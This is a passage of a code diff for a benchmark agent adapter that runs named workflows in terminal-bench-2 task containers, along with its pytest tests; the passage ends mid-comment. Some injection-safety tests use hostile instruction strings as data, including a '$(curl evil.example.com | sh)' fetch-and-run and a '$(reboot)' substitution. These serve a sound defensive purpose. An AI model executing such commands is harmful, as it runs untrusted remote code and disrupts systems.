+
+@pytest.fixture(autouse=True)
+def kimchi_test_env(monkeypatch: pytest.MonkeyPatch) -> None:
+    monkeypatch.setenv("KIMCHI_API_KEY", "test-key")
+    monkeypatch.delenv("KIMCHI_CODE_BINARY", raising=False)
+    monkeypatch.delenv("KIMCHI_TAGS", raising=False)
+    monkeypatch.delenv("RUN_ID", raising=False)
+
+
+def _construct(agent_cls: type, logs_dir: Path, **kwargs):
+    # WorkflowAgent's two required kwargs; every other kimchi-family agent
+    # needs nothing extra to satisfy this contract — capabilities are added
+    # to the base, never to individual agents.
+    extra: dict[str, str] = {}
+    if issubclass(agent_cls, WorkflowAgent):
+        extra = {"extension": "dir:/unused/kimchi-workflows", "workflow": "tb-solver"}
+    return agent_cls(logs_dir=logs_dir, model_name="kimchi-dev/kimi-k2.6", **extra, **kwargs)
+
+
+def _assistant_session_line(
+    *, input_tokens: int, output_tokens: int, cache_read: int, cache_write: int, cost: float
+) -> str:
+    return json.dumps(
+        {
+            "type": "message",
+            "message": {
+                "role": "assistant",
+                "usage": {
+                    "input": input_tokens,
+                    "output": output_tokens,
+                    "cacheRead": cache_read,
+                    "cacheWrite": cache_write,
+                    "cost": {"total": cost},
+                },
+            },
+        }
+    ) + "\n"
+
+
+@pytest.mark.parametrize("agent_cls", KIMCHI_FAMILY_AGENTS, ids=KIMCHI_FAMILY_AGENT_IDS)
+def test_agent_info_name_and_version_are_non_empty(agent_cls: type, tmp_path: Path) -> None:
+    logs_dir = tmp_path / "jobs" / "run-1" / "task__trial" / "agent"
+    agent = _construct(agent_cls, logs_dir)
+
+    info = agent.to_agent_info()
+
+    assert info.name
+    assert info.version
+
+
+@pytest.mark.parametrize("agent_cls", KIMCHI_FAMILY_AGENTS, ids=KIMCHI_FAMILY_AGENT_IDS)
+def test_sessions_are_aggregated_including_nested_directories(agent_cls: type, tmp_path: Path) -> None:
+    # Regression fixture for the base correctness fix in agent.py
+    # (populate_context_post_run's rglob): a session file nested under
+    # sessions/workflow/ — exactly where kimchi-workflows writes per-step
+    # sessions — must be counted for every kimchi-family agent, not
+    # only ones that happen to write flat session files.
+    logs_dir = tmp_path / "jobs" / "run-1" / "task__trial" / "agent"
+    sessions_dir = logs_dir / "sessions"
+    nested_dir = sessions_dir / "workflow"
+    nested_dir.mkdir(parents=True)
+    (sessions_dir / "main.jsonl").write_text(
+        _assistant_session_line(input_tokens=10, output_tokens=3, cache_read=2, cache_write=1, cost=0.5)
+    )
+    (nested_dir / "step-1.jsonl").write_text(
+        _assistant_session_line(input_tokens=20, output_tokens=5, cache_read=4, cache_write=0, cost=0.25)
+    )
+
+    agent = _construct(agent_cls, logs_dir)
+    context = AgentContext()
+    agent.populate_context_post_run(context)
+
+    assert context.n_input_tokens > 0
+    assert context.n_output_tokens > 0
+    assert context.n_cache_tokens > 0
+    assert context.cost_usd is not None
+    assert context.cost_usd > 0
+
+
+@pytest.mark.parametrize("agent_cls", KIMCHI_FAMILY_AGENTS, ids=KIMCHI_FAMILY_AGENT_IDS)
+async def test_env_dict_carries_the_same_keys_as_stock_kimchi(agent_cls: type, tmp_path: Path) -> None:
+    logs_dir = tmp_path / "jobs" / "run-1" / "task__trial" / "agent"
+
+    stock = _construct(RecordingKimchi, logs_dir)
+    with pytest.raises(asyncio.CancelledError):
+        await stock.run("hello", object(), AgentContext())
+
+    candidate = _construct(agent_cls, logs_dir)
+    with pytest.raises(asyncio.CancelledError):
+        await candidate.run("hello", object(), AgentContext())
+
+    assert set(candidate.agent_envs[0].keys()) == set(stock.agent_envs[0].keys())
+
+
+@pytest.mark.parametrize("agent_cls", KIMCHI_FAMILY_AGENTS, ids=KIMCHI_FAMILY_AGENT_IDS)
+async def test_prompt_template_is_applied_exactly_once(agent_cls: type, tmp_path: Path) -> None:
+    logs_dir = tmp_path / "jobs" / "run-1" / "task__trial" / "agent"
+    template_path = tmp_path / "template.j2"
+    template_path.write_text("TASK: {{ instruction }}")
+
+    agent = _construct(agent_cls, logs_dir, prompt_template_path=template_path)
+    with pytest.raises(asyncio.CancelledError):
+        await agent.run("hello", object(), AgentContext())
+
+    command = agent.agent_commands[0]
+    assert "TASK: hello" in command
+    assert "TASK: TASK: hello" not in command

--- a/benchmark/terminal-bench-2/src/kimchi_agent/gateway.py
+++ b/benchmark/terminal-bench-2/src/kimchi_agent/gateway.py
@@ -88,7 +88,7 @@ class KimchiGatewayMixin:
 
     def _split_model(self, model_name: str | None) -> tuple[str, str]:
         if not model_name or "/" not in model_name:
-            raise ValueError("--model is required and must use provider/model format, e.g. kimchi-dev/kimi-k2.5")
+            raise ValueError("--model is required and must use provider/model format, e.g. kimchi-dev/kimi-k2.7")
         provider, model_id = model_name.split("/", 1)
         if provider != KIMCHI_PROVIDER:
             raise ValueError(

--- a/benchmark/terminal-bench-2/src/kimchi_agent/workflow_agent.py
+++ b/benchmark/terminal-bench-2/src/kimchi_agent/workflow_agent.py
@@ -1,0 +1,237 @@
+"""kimchi + the kimchi-workflows pi extension, running one named workflow.
+
+Produces the same shape of ``result.json`` as stock ``Kimchi`` so one
+downstream pipeline reads both — ``conformance_test.py`` enforces that. Which
+is why this class uses only the hooks ``Kimchi`` exposes and never overrides
+``run()``; see ``Kimchi._extension_paths``.
+"""
+
+import json
+import shlex
+import shutil
+import tempfile
+from collections.abc import Callable
+from pathlib import Path
+from typing import TYPE_CHECKING
+
+from harbor.models.trial.result import AgentInfo
+
+from kimchi_agent.agent import CONTAINER_LOGS_DIR, Kimchi
+from kimchi_agent.workflow_extension import (
+    ExtensionSpec,
+    ResolvedExtension,
+    parse_extension_spec,
+    resolve_extension_spec,
+)
+
+if TYPE_CHECKING:
+    from harbor.environments.base import BaseEnvironment
+
+CONTAINER_EXTENSION_DIR = "/installed-agent/kimchi-workflows"
+CONTAINER_WORKFLOWS_STAGE_DIR = "/installed-agent/workflows"
+
+# Relative on purpose: the pre-launch commands run in the same shell, and so
+# the same cwd, as kimchi itself, which is the project root the extension
+# resolves workflow names against. Python cannot learn that path up front.
+PROJECT_WORKFLOWS_DIR = ".kimchi/workflows"
+
+WORKFLOW_INPUT_PATH = f"{CONTAINER_LOGS_DIR}/workflow-input.json"
+WORKFLOWS_HOST_DIR = Path(__file__).parent.parent.parent / "workflows"
+
+# workflows/ is also a dev directory; none of this belongs in a task container,
+# and `npm install` there would otherwise ship ~72MB plus a symlink out of the
+# repo. A denylist, since a workflow may legitimately need a data file beside it.
+WORKFLOWS_UPLOAD_IGNORE = shutil.ignore_patterns(
+    "node_modules",
+    "test",
+    "package.json",
+    "package-lock.json",
+    "tsconfig.json",
+    "vitest.config.ts",
+    ".gitignore",
+    "README.md",
+)
+
+ExtensionResolver = Callable[[ExtensionSpec], ResolvedExtension]
+
+
+class WorkflowAgent(Kimchi):
+    """Runs a named kimchi-workflows workflow instead of kimchi's default chat loop.
+
+    Two required agent kwargs select what runs:
+
+    - ``extension``: one of two forms, both resolved **on the host** and
+      uploaded to the container — identical treatment, just a different
+      source:
+
+      - ``npm:<pkg>[@<version>]`` — the published package. Resolved by
+        shelling out to ``npm`` on the host (``npm pack`` + extract +
+        ``npm install --omit=dev --omit=peer``), cached by ``<pkg>@<version>``
+        so a job of N trials resolves once.
+      - ``dir:<host path>`` — a developer's working tree, fingerprinted and
+        uploaded as-is (its own ``npm install`` is assumed already run). The
+        local-development path.
+
+      (``git:``-family specs and bare git URLs are rejected at construction —
+      see ``workflow_extension.parse_extension_spec``'s docstring for why.)
+
+    - ``workflow``: a workflow's own declared name (e.g. ``tb-solver``),
+      resolved by the extension against ``.kimchi/workflows/`` inside the
+      container — this adapter names it and nothing more; it does not resolve
+      a path itself (that is the extension's job, not the adapter's).
+    """
+
+    @staticmethod
+    def name() -> str:
+        return "kimchi-workflow"
+
+    def __init__(
+        self,
+        *args,
+        extension_resolver: ExtensionResolver | None = None,
+        **kwargs,
+    ) -> None:
+        extension_raw = kwargs.pop("extension", None)
+        workflow = kwargs.pop("workflow", None)
+        if not extension_raw or not str(extension_raw).strip():
+            raise ValueError(
+                "WorkflowAgent requires an 'extension' agent kwarg, e.g. "
+                "--agent-kwarg extension=npm:@kimchi-dev/kimchi-workflows@0.1.0, or "
+                "--agent-kwarg extension=dir:/path/to/kimchi-workflows"
+            )
+        if not workflow or not str(workflow).strip():
+            raise ValueError(
+                "WorkflowAgent requires a 'workflow' agent kwarg naming a declared "
+                "workflow, e.g. --agent-kwarg workflow=tb-solver"
+            )
+
+        # Parsed eagerly so a bad spec fails at `harbor run`, not ten minutes in.
+        self._extension_spec: ExtensionSpec = parse_extension_spec(str(extension_raw))
+        self._extension_raw = str(extension_raw)
+        self._workflow = str(workflow)
+        self._extension_short_identity: str | None = None
+        self._resolve_extension: ExtensionResolver = extension_resolver or resolve_extension_spec
+
+        super().__init__(*args, **kwargs)
+
+    async def install(self, environment: BaseEnvironment) -> None:
+        # Binary first, so a bad KIMCHI_CODE_BINARY surfaces before we resolve.
+        await super().install(environment)
+
+        resolved = self._resolve_extension(self._extension_spec)
+        self._extension_short_identity = resolved.short_identity
+        # Unfiltered, unlike the workflow sources below: an extension needs its
+        # node_modules (jiti lives there). A `dir:` checkout therefore uploads
+        # its devDependencies too — 342 MB against single-digit MB for `npm:`.
+        await environment.upload_dir(source_dir=resolved.host_dir, target_dir=CONTAINER_EXTENSION_DIR)
+
+        # Filtered copy — see WORKFLOWS_UPLOAD_IGNORE. Staged BEFORE the guard
+        # below so the guard can inspect what will actually be uploaded.
+        with tempfile.TemporaryDirectory(prefix="kimchi-workflows-stage-") as stage:
+            stage_dir = Path(stage) / "workflows"
+            shutil.copytree(WORKFLOWS_HOST_DIR, stage_dir, ignore=WORKFLOWS_UPLOAD_IGNORE)
+            self._assert_a_workflow_can_resolve(stage_dir)
+            await environment.upload_dir(source_dir=stage_dir, target_dir=CONTAINER_WORKFLOWS_STAGE_DIR)
+
+    def _assert_a_workflow_can_resolve(self, staged_workflows: Path) -> None:
+        """Fail at install, not ten minutes into a trial, when nothing the
+        container will receive can serve this run's ``workflow=``.
+
+        Scans the staged tree, which is exactly what gets uploaded — the source
+        tree also holds ``node_modules/@kimchi-dev/kimchi-workflows/``'s own
+        ``create.workflow.ts``, which the upload filter strips.
+
+        ``resolveWorkflow`` (``kimchi-workflows/src/host/workflow-catalog.ts``)
+        takes a ``.ts`` argument as a path, which reaches a nested file, and
+        anything else as a declared name, which only ``discoverWorkflows``'
+        non-recursive ``readdir`` can serve. So the required check depends on
+        which form was passed.
+        """
+        staged = sorted(staged_workflows.rglob("*.workflow.ts"))
+        if not staged:
+            raise RuntimeError(
+                f"No *.workflow.ts files found anywhere under {WORKFLOWS_HOST_DIR} that would reach "
+                "the container (the dev-only names in WORKFLOWS_UPLOAD_IGNORE are excluded from the "
+                "upload, and so from this check). WorkflowAgent has nothing to run, by name or by "
+                "path; see workflows/README.md for the expected layout."
+            )
+
+        if self._workflow.endswith(".ts") or any(path.parent == staged_workflows for path in staged):
+            return
+
+        nested = ", ".join(str(path.relative_to(staged_workflows)) for path in staged)
+        raise RuntimeError(
+            f"'workflow={self._workflow}' is a declared workflow name, which the extension resolves "
+            f"through a non-recursive scan of the top level of {WORKFLOWS_HOST_DIR} — but every "
+            f"*.workflow.ts that reaches the container is in a subdirectory ({nested}), where that "
+            "scan cannot see it. Move one to the top level, or address a nested file by path instead "
+            f"(workflow={PROJECT_WORKFLOWS_DIR}/<subdir>/<file>.workflow.ts). "
+            "See workflows/README.md, 'What goes here'."
+        )
+
+    def _extension_paths(self) -> list[str]:
+        # Both spec forms are uploaded to the same container path now —
+        # there is no longer a passthrough form that needs the raw spec
+        # string handed to `-e` verbatim.
+        return [CONTAINER_EXTENSION_DIR]
+
+    def _stdin_payload(self, instruction: str) -> str:
+        # `instruction` is intentionally unused here: it reaches kimchi
+        # through the input envelope file written by _pre_launch_commands
+        # below, never on the command line or on stdin — so it can never be
+        # mistaken for a flag (pi's parseArgs treats any token starting
+        # with "-" as one) and never appears in `ps`/shell history.
+        del instruction
+        return f"/workflow run {self._workflow} --input @{WORKFLOW_INPUT_PATH}"
+
+    def _pre_launch_commands(self, instruction: str) -> list[str]:
+        envelope = json.dumps({"instruction": instruction})
+        write_envelope = f"printf '%s' {shlex.quote(envelope)} > {shlex.quote(WORKFLOW_INPUT_PATH)}"
+
+        # PROJECT_WORKFLOWS_DIR is relative, deliberately. This command and
+        # the kimchi process it precedes run in the SAME shell invocation
+        # (see Kimchi._kimchi_launch_command's `parts` list, which this
+        # method's return value is appended to) — so $PWD here is, by
+        # construction, whatever project directory the extension's
+        # resolveWorkflow() looks under (<cwd>/.kimchi/workflows/*.workflow.ts).
+        # There is no reliable way to learn that directory from Python ahead
+        # of time, and hardcoding a guess would silently stop matching the
+        # day harbor changes the task working directory — so this command
+        # discovers it the same way the kimchi process about to read it does:
+        # by not asking, and just running there.
+        stage_workflows = (
+            f"mkdir -p {shlex.quote(PROJECT_WORKFLOWS_DIR)} && "
+            f"cp -a {shlex.quote(CONTAINER_WORKFLOWS_STAGE_DIR)}/. {shlex.quote(PROJECT_WORKFLOWS_DIR)}/"
+        )
+
+        return [write_envelope, stage_workflows]
+
+    def to_agent_info(self) -> AgentInfo:
+        base_info = super().to_agent_info()
+        # Both forms are host-resolved now, so both go through the same
+        # `resolved.short_identity` set in install() — no per-form branching
+        # needed here any more:
+        #   `dir:` -> `dir:<basename>@<sha-or-"dirty">`
+        #   `npm:` -> `npm:<pkg>@<resolved version>+<short integrity/shasum>`,
+        #             or just `npm:<pkg>@<resolved version>` if the registry
+        #             gave us nothing to hash (workflow_extension._npm_identity)
+        # An unpinned `npm:` spec (no `@<version>`) is still accepted, not
+        # rejected — but unlike the old passthrough design, host resolution
+        # DOES learn the actual resolved version each time, so two runs of an
+        # unpinned spec now record different identities whenever the registry
+        # actually resolved different code, instead of being indistinguishable
+        # by construction.
+        extension_identity = self._extension_short_identity or "unresolved"
+        # Accepted limitation: workflow file CONTENT is not captured by
+        # this version string. Workflows are files in THIS repo
+        # (benchmark/terminal-bench-2/workflows/), not the extension, so
+        # neither the kimchi version nor the extension identity covers an
+        # edit to one. Two runs of an edited `tb-solver` therefore produce
+        # identical version strings and are indistinguishable in result.json
+        # — see workflow_agent_test.py's test asserting this deliberately, so
+        # the limitation stays documented in code, not just in prose. The
+        # zero-cost mitigation is a convention, not a mechanism: give an
+        # edited variant its own workflow name (`tb-solver-v2`), which IS
+        # distinguishable, because the name is already part of this string.
+        version = f"{base_info.version}+{self._workflow}@{extension_identity}"
+        return base_info.model_copy(update={"version": version})

--- a/benchmark/terminal-bench-2/src/kimchi_agent/workflow_agent_test.py
+++ b/benchmark/terminal-bench-2/src/kimchi_agent/workflow_agent_test.py
@@ -1,0 +1,866 @@
+import asyncio
+import json
+import shlex
+from pathlib import Path
+
+import pytest
+from harbor.models.agent.context import AgentContext
+
+import kimchi_agent.workflow_agent as workflow_agent_module
+from kimchi_agent.agent import BINARY_PATH
+from kimchi_agent.agent import Kimchi as StockKimchi
+from kimchi_agent.workflow_agent import (
+    CONTAINER_EXTENSION_DIR,
+    CONTAINER_WORKFLOWS_STAGE_DIR,
+    PROJECT_WORKFLOWS_DIR,
+    WORKFLOW_INPUT_PATH,
+    WorkflowAgent,
+)
+from kimchi_agent.workflow_extension import (
+    DirExtensionSpec,
+    NpmExtensionSpec,
+    ResolvedExtension,
+    parse_extension_spec,
+    resolve_extension_spec,
+)
+
+
+class _RecordingExecMixin:
+    """Shared with agent_test.py's RecordingKimchi in spirit, not in code: each
+    kimchi_agent test file declares its own recording harness (see
+    gsd_kimchi_test.py's RecordingGsdKimchi) rather than importing test
+    doubles across modules.
+    """
+
+    def __init__(self, *args, **kwargs):
+        super().__init__(*args, **kwargs)
+        self.agent_commands: list[str] = []
+        self.agent_envs: list[dict[str, str] | None] = []
+        self.root_commands: list[str] = []
+        self.setup_commands: list[str] = []
+
+    async def exec_as_agent(self, _environment, command: str, env=None, cwd=None, timeout_sec=None):
+        # Install-time housekeeping is recorded apart so agent_commands[0] stays the launch.
+        if BINARY_PATH not in command:
+            self.setup_commands.append(command)
+            return
+        self.agent_commands.append(command)
+        self.agent_envs.append(env)
+        raise asyncio.CancelledError
+
+    async def exec_as_root(self, _environment, command: str, env=None, cwd=None, timeout_sec=None):
+        self.root_commands.append(command)
+
+
+class RecordingWorkflowAgent(_RecordingExecMixin, WorkflowAgent):
+    pass
+
+
+class RecordingStockKimchi(_RecordingExecMixin, StockKimchi):
+    pass
+
+
+class FakeEnvironment:
+    """Records upload_dir calls; install() tests never touch a real container."""
+
+    def __init__(self) -> None:
+        self.uploaded_dirs: list[tuple[Path, str]] = []
+
+    async def upload_dir(self, source_dir: Path | str, target_dir: str) -> None:
+        self.uploaded_dirs.append((Path(source_dir), target_dir))
+
+
+@pytest.fixture(autouse=True)
+def kimchi_test_env(monkeypatch: pytest.MonkeyPatch) -> None:
+    monkeypatch.setenv("KIMCHI_API_KEY", "test-key")
+    monkeypatch.delenv("KIMCHI_CODE_BINARY", raising=False)
+    monkeypatch.delenv("KIMCHI_TAGS", raising=False)
+    monkeypatch.delenv("RUN_ID", raising=False)
+
+
+def _agent(tmp_path: Path, **overrides) -> RecordingWorkflowAgent:
+    kwargs = {
+        "logs_dir": tmp_path / "jobs" / "run-1" / "task__trial" / "agent",
+        "model_name": "kimchi-dev/kimi-k2.6",
+        "extension": "dir:/some/host/kimchi-workflows",
+        "workflow": "tb-solver",
+    }
+    kwargs.update(overrides)
+    return RecordingWorkflowAgent(**kwargs)
+
+
+def _write_fake_kimchi_binary_env(tmp_path: Path, monkeypatch: pytest.MonkeyPatch) -> None:
+    # Points KIMCHI_CODE_BINARY at a throwaway bin/+share/ tree so
+    # Kimchi.install() (called first by WorkflowAgent.install()) takes the
+    # local-binary branch instead of hitting the GitHub releases API.
+    dist_dir = tmp_path / "kimchi-dist"
+    bin_path = dist_dir / "bin" / "kimchi"
+    bin_path.parent.mkdir(parents=True)
+    bin_path.write_text("#!/bin/sh\necho fake\n")
+    bin_path.chmod(0o755)
+    share_dir = dist_dir / "share" / "kimchi"
+    share_dir.mkdir(parents=True)
+    (share_dir / "package.json").write_text("{}")
+    monkeypatch.setenv("KIMCHI_CODE_BINARY", str(bin_path))
+
+
+# --- extension spec classification (module-level, no agent involved) -------
+
+
+@pytest.mark.parametrize(
+    "raw",
+    [
+        "npm:@kimchi-dev/kimchi-workflows",
+        "npm:@kimchi-dev/kimchi-workflows@0.1.0",
+        "npm:kimchi-workflows@1.2.3",
+        # Unscoped, no version.
+        "npm:kimchi-workflows",
+        # Scoped, prerelease version (the run-workflow.sh default's shape).
+        "npm:@kimchi-dev/kimchi-workflows@0.0.1-0",
+    ],
+)
+def test_parse_extension_spec_npm_is_classified(raw: str) -> None:
+    # Classification only: parse_extension_spec does not split package/version
+    # here — that happens later, in resolve_extension_spec, only when a spec
+    # actually needs resolving (workflow_extension_test.py covers the split).
+    assert parse_extension_spec(raw) == NpmExtensionSpec(raw=raw)
+
+
+def test_parse_extension_spec_dir() -> None:
+    assert parse_extension_spec("dir:/abs/path/to/kimchi-workflows") == DirExtensionSpec(
+        path=Path("/abs/path/to/kimchi-workflows")
+    )
+
+
+@pytest.mark.parametrize(
+    "raw",
+    [
+        "",
+        "   ",
+        "bogus",
+        "castai/kimchi-workflows",
+        "dir:",
+    ],
+)
+def test_parse_extension_spec_rejects_unclassifiable_input(raw: str) -> None:
+    with pytest.raises(ValueError, match="extension"):
+        parse_extension_spec(raw)
+
+
+def test_parse_extension_spec_rejection_message_lists_accepted_forms() -> None:
+    with pytest.raises(ValueError) as exc_info:
+        parse_extension_spec("bogus")
+    message = str(exc_info.value)
+    assert "npm:" in message
+    assert "dir:" in message
+
+
+# --- extension spec classification: git: is REMOVED, not passthrough --------
+
+
+@pytest.mark.parametrize(
+    "raw",
+    [
+        "git:github.com/kimchi-dev/kimchi-workflows",
+        "git:github.com/kimchi-dev/kimchi-workflows@v1",
+        # pi's scp-like SSH shorthand.
+        "git:git@github.com:kimchi-dev/kimchi-workflows@v1",
+        # Bare URL forms pi also accepts directly, with no "git:" prefix.
+        "https://github.com/kimchi-dev/kimchi-workflows.git",
+        "http://internal.example.com/kimchi-workflows.git",
+        "ssh://git@github.com/kimchi-dev/kimchi-workflows.git",
+        "git://github.com/kimchi-dev/kimchi-workflows.git",
+    ],
+)
+def test_parse_extension_spec_rejects_git_family_with_a_specific_message(raw: str) -> None:
+    # A git-family spec is not just unrecognised — it is a form that USED to
+    # be accepted (as pi-native passthrough) and was deliberately removed
+    # once a smoke trial proved passthrough resolution can't work inside a
+    # terminal-bench task container (no Node toolchain). The rejection
+    # message says so, rather than reading like a typo in the prefix.
+    with pytest.raises(ValueError) as exc_info:
+        parse_extension_spec(raw)
+    message = str(exc_info.value)
+    assert "git:" in message
+    assert "npm:" in message
+    assert "dir:" in message
+    assert raw in message
+
+
+# --- agent kwarg parsing (WorkflowAgent construction) -----------------------
+
+
+@pytest.mark.parametrize(
+    "extension",
+    [
+        "npm:@kimchi-dev/kimchi-workflows@0.1.0",
+        "npm:@kimchi-dev/kimchi-workflows",
+        "npm:kimchi-workflows@1.2.3",
+        "dir:/abs/path/to/kimchi-workflows",
+        "dir:~/dev/kimchi-workflows",
+    ],
+)
+def test_valid_extension_kwargs_are_accepted_at_construction(tmp_path: Path, extension: str) -> None:
+    agent = _agent(tmp_path, extension=extension)
+    assert agent._workflow == "tb-solver"
+
+
+@pytest.mark.parametrize(
+    "extension",
+    [
+        "",
+        "bogus",
+        "dir:",
+        # git: was removed, not merely never-implemented — construction must
+        # reject it with the same specific message parse_extension_spec
+        # raises, not a generic "malformed" one.
+        "git:github.com/kimchi-dev/kimchi-workflows@main",
+        "https://github.com/kimchi-dev/kimchi-workflows.git",
+    ],
+)
+def test_malformed_extension_kwarg_is_rejected_at_construction(tmp_path: Path, extension: str) -> None:
+    with pytest.raises(ValueError, match="extension"):
+        _agent(tmp_path, extension=extension)
+
+
+def test_missing_extension_kwarg_is_rejected(tmp_path: Path) -> None:
+    with pytest.raises(ValueError, match="extension"):
+        _agent(tmp_path, extension=None)
+
+
+def test_missing_workflow_kwarg_is_rejected(tmp_path: Path) -> None:
+    with pytest.raises(ValueError, match="workflow"):
+        _agent(tmp_path, workflow=None)
+
+
+# --- launch command: extension paths (both forms are host-resolved now) ----
+
+
+@pytest.mark.parametrize(
+    "extension",
+    ["dir:/some/host/kimchi-workflows", "npm:@kimchi-dev/kimchi-workflows@0.1.0"],
+    ids=["dir", "npm"],
+)
+def test_extension_paths_is_always_the_container_dir(tmp_path: Path, extension: str) -> None:
+    # Neither form is passthrough any more: both are resolved on the host
+    # and uploaded to the same container path, so _extension_paths is no
+    # longer a function of which form was given.
+    agent = _agent(tmp_path, extension=extension)
+    assert agent._extension_paths() == [CONTAINER_EXTENSION_DIR]
+
+
+async def test_launch_command_has_exactly_one_extension_flag(tmp_path: Path) -> None:
+    agent = _agent(tmp_path)
+
+    with pytest.raises(asyncio.CancelledError):
+        await agent.run("do the task", object(), AgentContext())
+
+    command = agent.agent_commands[0]
+    assert command.count("-e ") == 1
+    assert f"-e {CONTAINER_EXTENSION_DIR} --print" in command
+
+
+# --- install(): npm: (now host-resolved + uploaded, exactly like dir:) ------
+
+
+async def test_npm_spec_resolves_on_host_and_uploads_to_container_path(
+    tmp_path: Path, monkeypatch: pytest.MonkeyPatch
+) -> None:
+    _write_fake_kimchi_binary_env(tmp_path, monkeypatch)
+    fake_workflows_dir = tmp_path / "fake-workflows"
+    fake_workflows_dir.mkdir()
+    (fake_workflows_dir / "tb-solver.workflow.ts").write_text("export default {}")
+    monkeypatch.setattr(workflow_agent_module, "WORKFLOWS_HOST_DIR", fake_workflows_dir)
+
+    fake_extension_dir = tmp_path / "fake-npm-ext"
+    fake_extension_dir.mkdir()
+    resolver_calls = []
+
+    def fake_resolver(spec):
+        resolver_calls.append(spec)
+        return ResolvedExtension(
+            host_dir=fake_extension_dir,
+            identity="npm:@kimchi-dev/kimchi-workflows@0.1.0+sha512-abc123",
+            short_identity="npm:@kimchi-dev/kimchi-workflows@0.1.0+abc123",
+        )
+
+    extension = "npm:@kimchi-dev/kimchi-workflows@0.1.0"
+    agent = _agent(tmp_path, extension=extension, extension_resolver=fake_resolver)
+    environment = FakeEnvironment()
+
+    await agent.install(environment)
+
+    # Invoked exactly once with the parsed spec (not called again on a
+    # second install() — that's the WorkflowAgent-level half of "resolves
+    # once per job"; workflow_extension_test.py covers the on-disk cache that
+    # makes a *second agent instance* in the same job just as cheap).
+    assert len(resolver_calls) == 1
+    assert resolver_calls[0] == NpmExtensionSpec(raw=extension)
+    assert (fake_extension_dir, CONTAINER_EXTENSION_DIR) in environment.uploaded_dirs
+    assert CONTAINER_WORKFLOWS_STAGE_DIR in [target for _, target in environment.uploaded_dirs]
+
+
+async def test_npm_spec_never_reaches_the_launch_command_as_a_raw_string(
+    tmp_path: Path, monkeypatch: pytest.MonkeyPatch
+) -> None:
+    # The `-e` flag must carry the container path, never the raw "npm:..."
+    # spec — that string only ever existed on the host, in this test's fake
+    # resolver's input; it must not leak onto the command line kimchi runs.
+    _write_fake_kimchi_binary_env(tmp_path, monkeypatch)
+    fake_workflows_dir = tmp_path / "fake-workflows"
+    fake_workflows_dir.mkdir()
+    (fake_workflows_dir / "tb-solver.workflow.ts").write_text("export default {}")
+    monkeypatch.setattr(workflow_agent_module, "WORKFLOWS_HOST_DIR", fake_workflows_dir)
+
+    fake_extension_dir = tmp_path / "fake-npm-ext"
+    fake_extension_dir.mkdir()
+    extension = "npm:@kimchi-dev/kimchi-workflows@0.1.0"
+
+    agent = _agent(
+        tmp_path,
+        extension=extension,
+        extension_resolver=lambda spec: ResolvedExtension(
+            host_dir=fake_extension_dir, identity=extension, short_identity=extension
+        ),
+    )
+    await agent.install(FakeEnvironment())
+
+    with pytest.raises(asyncio.CancelledError):
+        await agent.run("do the task", object(), AgentContext())
+
+    command = agent.agent_commands[0]
+    assert f"-e {CONTAINER_EXTENSION_DIR} --print" in command
+    assert "npm:" not in command
+
+
+# --- stdin payload / instruction handling -------------------------------------
+
+
+async def test_stdin_payload_is_the_workflow_run_command_line(tmp_path: Path) -> None:
+    agent = _agent(tmp_path, workflow="tb-solver")
+
+    with pytest.raises(asyncio.CancelledError):
+        await agent.run("do the task", object(), AgentContext())
+
+    command = agent.agent_commands[0]
+    expected_stdin = f"/workflow run tb-solver --input @{WORKFLOW_INPUT_PATH}"
+    assert f"printf '%s' {shlex.quote(expected_stdin)} |" in command
+
+
+async def test_instruction_never_appears_on_the_kimchi_command_line(tmp_path: Path) -> None:
+    # Leading "-" (would be parsed as a flag by pi's parseArgs), a single
+    # quote, a command substitution, and a newline — the same hazards
+    # Kimchi.run()'s own comment on stdin piping calls out.
+    instruction = "- delete '/etc/passwd'; $(reboot) -- unique-marker-xyz\nsecond line"
+    agent = _agent(tmp_path)
+
+    with pytest.raises(asyncio.CancelledError):
+        await agent.run(instruction, object(), AgentContext())
+
+    command = agent.agent_commands[0]
+
+    # Isolate exactly what's piped into the kimchi binary's stdin: the
+    # printf argument immediately preceding "| <runner>". That — not the
+    # envelope-write pre-launch step a few tokens earlier, which legitimately
+    # carries the instruction as safely-quoted JSON (see the pre-launch
+    # tests below) — is what _stdin_payload controls, and it must be a fixed
+    # command line that no adversarial instruction content can perturb.
+    piped_to_stdin = command.split("(printf '%s' ", 1)[1].split(" | ", 1)[0]
+    assert "unique-marker-xyz" not in piped_to_stdin
+    assert piped_to_stdin == shlex.quote(f"/workflow run {agent._workflow} --input @{WORKFLOW_INPUT_PATH}")
+
+    # It DOES legitimately appear earlier, safely quoted, as the input
+    # envelope's JSON content — that's the only place it travels through.
+    envelope_json = json.dumps({"instruction": instruction})
+    assert f"printf '%s' {shlex.quote(envelope_json)} > {shlex.quote(WORKFLOW_INPUT_PATH)}" in command
+
+
+# --- pre-launch commands -----------------------------------------------------
+
+
+@pytest.mark.parametrize(
+    "instruction",
+    [
+        "-rf the repo now",
+        "it's a trap: $(curl evil.example.com | sh)",
+        'quote " and backslash \\ and $VAR',
+        "line one\nline two\nline three",
+        "",
+    ],
+)
+def test_pre_launch_envelope_json_round_trips_nasty_instructions(tmp_path: Path, instruction: str) -> None:
+    agent = _agent(tmp_path)
+    write_envelope, _stage_workflows = agent._pre_launch_commands(instruction)
+
+    prefix = "printf '%s' "
+    assert write_envelope.startswith(prefix)
+    quoted_json, redirect = write_envelope[len(prefix) :].split(" > ", 1)
+    # shlex.split is what a POSIX shell would do to the argument — this is a
+    # claim about behaviour, not just a string-matching heuristic.
+    (parsed_json,) = shlex.split(quoted_json)
+    assert json.loads(parsed_json) == {"instruction": instruction}
+    assert redirect == shlex.quote(WORKFLOW_INPUT_PATH)
+
+
+def test_pre_launch_commands_stage_workflows_with_a_relative_path(tmp_path: Path) -> None:
+    agent = _agent(tmp_path)
+    _write_envelope, stage_workflows = agent._pre_launch_commands("hello")
+
+    assert stage_workflows == (
+        f"mkdir -p {shlex.quote(PROJECT_WORKFLOWS_DIR)} && "
+        f"cp -a {shlex.quote(CONTAINER_WORKFLOWS_STAGE_DIR)}/. {shlex.quote(PROJECT_WORKFLOWS_DIR)}/"
+    )
+    assert not PROJECT_WORKFLOWS_DIR.startswith("/")
+
+
+async def test_pre_launch_commands_land_before_kimchi_starts(tmp_path: Path) -> None:
+    agent = _agent(tmp_path)
+
+    with pytest.raises(asyncio.CancelledError):
+        await agent.run("hello", object(), AgentContext())
+
+    command = agent.agent_commands[0]
+    _write_envelope, stage_workflows = agent._pre_launch_commands("hello")
+    # Same established pattern as harness settings / skills registration in
+    # Kimchi._kimchi_launch_command: appended to `parts`, immediately before
